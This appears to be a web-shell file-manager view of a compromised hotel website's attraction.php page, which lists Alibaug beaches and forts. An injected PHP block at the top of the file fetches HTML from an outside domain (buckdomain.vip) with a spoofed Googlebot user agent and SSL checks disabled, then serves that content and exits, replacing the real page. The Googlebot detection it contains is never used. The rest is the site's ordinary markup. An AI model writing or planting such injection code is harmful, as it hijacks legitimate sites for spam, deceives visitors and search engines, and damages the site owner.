File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/pkfarmstay.com/attraction.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/ubm4d/pkfarmstay.com-attraction.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Attraction | Prabhukrupa Tourist Farm</title> <!-- Stylesheets --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/style.css" rel="stylesheet"> <!-- Responsive File --> <link href="assets/css/responsive.css" rel="stylesheet"> <!-- Color File --> <link href="assets/css/color.css" rel="stylesheet"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=CorModant:wght@400;500;600;700&family=DM+Sans:wght@400;500;700&display=swap" rel="stylesheet"> <link rel="shortcut icon" href="assets/images/favicon.png" type="image/x-icon"> <link rel="icon" href="assets/images/favicon.png" type="image/x-icon"> <!-- Responsive --> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]--> <!--[if lt IE 9]><script src="js/respond.js"></script><![endif]--> </head> <body> <div class="page-wrapper"> <!--Header--> <?php include 'include/header.php'?> <div class="page-title" style="background-image: url(assets/images/background/page-title.jpg);"> <div class="auto-container"> <h1>Attraction</h1> </div> </div> <div class="bredcrumb-wrap"> <div class="auto-container"> <ul class="bredcrumb-list"> <li><a href="index.php">Home</a></li> <li>Attraction</li> </ul> </div> </div> <section class="section-padding"> <div class="auto-container"> <div class="row"> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/1.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Murud Janjira Fort</h4> <p>Murud Janjira fort is around 54 km from Alibaug and is spread in the area of around 22 acres. The fort was originally a wooden structure, which was later renovated by Sidi Sirul Khan in the 17th century. Fort is an architectural masterpiece. The fundamental passage has a stone cutting, delineating six elephants caught by a solitary tiger, an image of the courage of the Siddis.</p> </div> </div> </div> </div> </div> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/2.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Alibaug Beach</h4> <p> If you love exploring the beaches and is planning for a trip than Alibaug beach is one of the best tourist places in Alibaug. The best thing about this beach is that you can enjoy the sight of the Colaba Fort. Take a short boat ride to the popular fort which gives a magnificent view. One can also visit the Ganesh temple which is 400 years.</p> </div> </div> </div> </div> </div> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/3.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Kolaba Fort</h4> <p>There is no doubt in that exploring the fort is something which everyone loves to try once in a lifetime. The hidden stories of the forts always beckons us to explore these places. One such place in Alibaug which you would love to go is the Kolaba Fort which is located at a distance of 1-2 km from the shores of Alibaug.</p> </div> </div> </div> </div> </div> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/4.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Nagaon Beach</h4> <p>If you are looking for some adventure water sport activities then this beach is the best option for you. Get amazed with the enchanting beauty of the cypress grove and the sandy beach with its crystal clear water. The beach is around 3 km long and is an ideal place for the tourist where they can indulge in some activities like snorkelling and scuba diving. </p> </div> </div> </div> </div> </div> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/5.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Kihim Beach</h4> <p>Dusk, cool wind and is searching for some photography than Kihim Beach is one such beautiful place to see in Alibaug that one should visit. The shoreline is best known for its encompassing with the perfectly clear water and the thick vegetation up and down the shore. Make some noteworthy minutes with your adored one while you visit the calm Kihim goan and appreciate scrumptious Indian cooking.</p> </div> </div> </div> </div> </div> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/6.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Kanakeshwar Forest</h4> <p>Kanakeshwar Forest stands out as one of the famous tourist places in Alibaug, since it is a dense forest with a collection of rare flora and fauna. In addition to it, the climate is always cool and the place gets enough breezes for it is located on the Konkan coast near to Alibaug.</p> </div> </div> </div> </div> </div> <div class="col-lg-12"> <div class="event-1-block align-items-center d-flex wow fadeInLeft" data-wow-delay=".2s" data-wow-duration=".8s"> <div class="row align-items-center"> <div class="col-md-5"> <div class="event-1-image"> <a href="#"><img src="assets/images/resource/attraction/7.jpg" alt=""></a> </div> </div> <div class="col-md-7"> <div class="event-1-bottom-content"> <h4 class="event-1-title mb_5">Murud Beach</h4> <p>For beach lovers, Murud Beach is a visual treat with a vast stretch of black sand along the coastline. New-age travellers, who search for exciting tourist places in Alibuag, should add this location in your go-to list. Here too, tourists can delve into various water sports and boat rides and feels the picturesque beach scenery at ease.</p> </div> </div> </div> </div> </div> </div> </div> </section> <!--Footer--> <?php include 'include/footer.php'?> </div> <!--Scroll to top--> <div class="scroll-to-top"> <div> <div class="scroll-top-inner"> <div class="scroll-bar"> <div class="bar-inner"></div> </div> <div class="scroll-bar-text">Go To Top</div> </div> </div> </div> <!-- Scroll to top end --> <script src="assets/js/jquery.min.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery.nice-select.min.js"></script> <script src="assets/js/jquery.fancybox.js"></script> <script src="assets/js/isotope.js"></script> <script src="assets/js/appear.js"></script> <script src="assets/js/wow.js"></script> <script src="assets/js/TweenMax.min.js"></script> <script src="assets/js/swiper.min.js"></script> <script src="assets/js/jquery.ajaxchimp.min.js"></script> <script src="assets/js/parallax-scroll.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/booking-form.js"></script> <script src="assets/js/odometer.min.js"></script> <script src="assets/js/script.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings